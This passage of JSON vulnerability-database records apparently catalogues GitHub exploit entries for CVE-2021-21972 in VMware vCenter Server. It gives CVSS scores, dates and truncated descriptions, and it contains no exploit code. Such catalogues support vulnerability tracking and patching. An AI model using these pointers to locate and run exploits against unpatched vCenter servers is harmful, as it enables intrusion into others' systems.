"2021-11-22T11:25:34", "id": "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:41:41", "description": "# CVE-2021-21972\nCVE-2021-21972\n\n\n# Works On\n\n- VMware-VCSA-all-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 
"NONE"}, "impactScore": 5.9}, "published": "2021-04-03T12:09:53", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-03T12:10:03", "id": "64EF6553-4D22-526B-A1CC-09212DBD7625", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-11T21:49:58", "description": "# CVE-2021-21972\nProof of Concept Exploit for vCenter CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T16:31:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bul